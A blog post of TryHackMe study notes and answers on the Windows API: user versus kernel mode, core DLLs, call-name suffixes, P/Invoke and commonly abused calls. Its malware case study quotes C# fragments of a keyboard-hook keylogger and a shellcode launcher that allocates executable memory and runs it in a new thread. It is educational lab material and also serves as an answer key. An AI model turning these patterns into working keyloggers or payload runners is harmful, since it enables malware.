Introduction to Windows API - consoletornado.com

[TryHackMe Room Link](https://tryhackme.com/room/windowsapi) **Note: Free Room** ## Table of Contents - [[#Notes|Notes]] - [[#Notes#API's (Application Programming Interface)|API's (Application Programming Interface)]] - [[#Notes#Windows User vs Kernel Mode|Windows User vs Kernel Mode]] - [[#Notes#Components of the Windows API|Components of the Windows API]] - [[#Components of the Windows API#API|API]] - [[#Notes#Header Files / Imports|Header Files / Imports]] - [[#Header Files / Imports#Some Core DLL's|Some Core DLL's]] - [[#Header Files / Imports#Supplemental DLL's|Supplemental DLL's]] - [[#Notes#Call Structures|Call Structures]] - [[#Call Structures#In/Out Parameters|In/Out Parameters]] - [[#Notes#Windows Header File (`<windows.h>`)|Windows Header File (`<windows.h>`)]] - [[#Notes#P/Invoke|P/Invoke]] - [[#Notes#Commonly abused API's|Commonly abused API's]] - [[#Tasks|Tasks]] - [[#Tasks#Task 01: Introduction|Task 01: Introduction]] - [[#Tasks#Task 02: Subsystem and Hardware Interaction|Task 02: Subsystem and Hardware Interaction]] - [[#Tasks#Task 03: Components of the Windows API|Task 03: Components of the Windows API]] - [[#Tasks#Task 04: OS Libraries|Task 04: OS Libraries]] - [[#Tasks#Task 05: API Call Structure|Task 05: API Call Structure]] - [[#Tasks#Task 06: C API Implementations|Task 06: C API Implementations]] - [[#Tasks#Task 07: .NET and PowerShell API Implementations|Task 07: .NET and PowerShell API Implementations]] - [[#Tasks#Task 08: Commonly Abused API Calls|Task 08: Commonly Abused API Calls]] - [[#Tasks#Task 09: Malware Case Study|Task 09: Malware Case Study]] - [[#Task 09: Malware Case Study#Key Logger Notes|Key Logger Notes]] - [[#Task 09: Malware Case Study#Shellcode Notes|Shellcode Notes]] - [[#Task 09: Malware Case Study#Questions|Questions]] - [[#Tasks#Task 10: Conclusion|Task 10: Conclusion]] --- ## Notes ### API's (Application Programming Interface) - Set of rules/protocols for building software/applications. - Allows and defines the different methods programs use to communicate with each other. - Includes: - Kinds of requests that can be made - How they're made - Data formats that should be used - Conventions to follow - More use cases documented [here](https://learn.microsoft.com/en-us/windows/win32/apiindex/windows-api-list) ### Windows User vs Kernel Mode Hardware access is distinguished between two different modes; user and kernel mode. - User Mode - No direct hardware access - Only can access "owned" memory locations - Kernel Mode - Direct hardware access - Full access to physical memory ### Components of the Windows API #### API - General term for calls in the win32 API structure ### Header Files / Imports - Defines what libraries will be imported at run-time - Defined by header files or library imports - Uses pointers to obtain function addresses #### Some Core DLL's - Defines call structures - Define kernel and user services | not found in a single subsystem - KERNEL32, USER32, and ADVAPI32 #### Supplemental DLL's - Controls separate subsystems of the Windows OS - NTDLL, COM, FVEAPI, etc. ### Call Structures API call functionality can be extended by adding these characters onto the call name. | Character | Explanation | | --------- | -------------------------------------------------------------------- | | A | Represents an 8-bit character set with ANSI encoding | | W | Represents a Unicode encoding | | Ex | Provides extended functionality or in/out parameters to the API call | - ANSI - Type of encoding based on ASCII - Includes all 128 ASCII characters but adds 128 more for accented letters and symbols used in Western European languages. - Is system-dependent so it can change depending on your Windows system's regional settings - Was the primary text encoding method on Windows before UTF-8. The structure of each different API call is documented by Microsoft [here](https://learn.microsoft.com/en-us/windows/win32/apiindex/windows-api-list) #### In/Out Parameters Defined in the call structure. - See example below which specifies the IO parameters for `WriteProcessMemory()`. ```C++ BOOL WriteProcessMemory( [in] HANDLE hProcess, [in] LPVOID lpBaseAddress, [in] LPCVOID lpBuffer, [in] SIZE_T nSize, [out] SIZE_T *lpNumberOfBytesWritten ); ``` ### Windows Header File (`<windows.h>`) This header file is used to define API call structures and obtain function pointers (variable that holds the entry memory address of a function). In C/C++ it's used at top of file: ``` #include <windows.h> ``` ### P/Invoke P/Invoke is a feature in Windows that lets higher level languages such as C#/.NET call native Windows functions from DLL's as Window's API are often written in C or C++. Basically used to import DLLs and assign pointers to these API calls. ### Commonly abused API's Documented: - [MalAPI.io](http://malapi.io/). - [SANs](https://www.sans.org/white-papers/33649/) --- ## Tasks ### Task 01: Introduction No answer required. ### Task 02: Subsystem and Hardware Interaction Does a process in the user mode have direct hardware access? (Y/N) - No Does launching an application as an administrator open the process in kernel mode? (Y/N) - No ### Task 03: Components of the Windows API What header file imports and defines the User32 DLL and structure? - `winuser.h` What parent header file contains all other required child and core header files? - `windows.h` ### Task 04: OS Libraries What overarching namespace provides P/Invoke to .NET? - `system` What memory protection solution obscures the process of importing API calls? - `ASLR` ### Task 05: API Call Structure Which character appended to an API call represents an ANSI encoding? - `A` Which character appended to an API call represents extended functionality? - `Ex` What is the memory allocation type of 0x00080000 in the VirtualAlloc API call? - `MEM_RESET` - [Hint](https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc) ### Task 06: C API Implementations Do you need to define a structure to use API calls in C? (Y/N) - `No` - Already included in the Windows header file ### Task 07: .NET and PowerShell API Implementations What method is used to import a required DLL? - `DllImport` What type of method is used to reference the API call to obtain a struct? - `External` ### Task 08: Commonly Abused API Calls Which API call returns the address of an exported DLL function? - GetProcAddress Which API call imports a specified DLL into the address space of the calling process? - LoadLibrary ### Task 09: Malware Case Study #### Key Logger Notes ```C# [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId); [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] [return: MarshalAs(UnmanagedType.Bool)] private static extern bool UnhookWindowsHookEx(IntPtr hhk); [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern IntPtr GetModuleHandle(string lpModuleName); private static int WHKEYBOARDLL = 13; [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] private static extern IntPtr GetCurrentProcess(); ``` API Calls: - `SetWindowsHookEx` - Installs a memory hook into a hook chain to monitor for certain events - `UnhookWindowsHookEx` - Removes an installed hook from the hook chain - `GetModuleHandle` - Returns a module handle for the specified module if mapped into the calling process's address space - `GetCurrentProcess` - Retrieves a pseudo handle for the current process. #### Shellcode Notes ```C# private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect); [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); [DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId); UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length); IntPtr hThread = IntPtr.Zero; UInt32 threadId = 0; IntPtr pinfo = IntPtr.Zero; hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); WaitForSingleObject(hThread, 0xFFFFFFFF); return; ``` API Calls: - `VirtualAlloc` - Reserves, commits, or changes the state of a region of pages in the virtual address space of the calling process. - `WaitForSingleObject` - Waits until the specified object is in the signaled state or the time-out interval elapses - `CreateThread` - Creates a thread to execute within the virtual address space of the calling process #### Questions **What Win32 API call is used to obtain a pseudo handle of our current process in the keylogger sample?** - `GetCurrentProcess` **What Win32 API call is used to set a hook on our current process in the keylogger sample?** - `SetWindowsHookEx` **What Win32 API call is used to obtain a handle from the pseudo handle in the keylogger sample?** - `GetModuleHandle` **What Win32 API call is used unset the hook on our current process in the keylogger sample?** - `UnhookWindowsHookEx` **What Win32 API call is used to allocate memory for the size of the shellcode in the shellcode launcher sample?** - `VirtualAlloc` **What native method is used to write shellcode to an allocated section of memory in the shellcode launcher sample?** - `Marshal.copy` **What Win32 API call is used to create a new execution thread in the shellcode launcher sample?** - `CreateThread` **What Win32 API call is used to wait for the thread to exit in the shellcode launcher sample?** - `WaitForSingleObject` ### Task 10: Conclusion No answer required.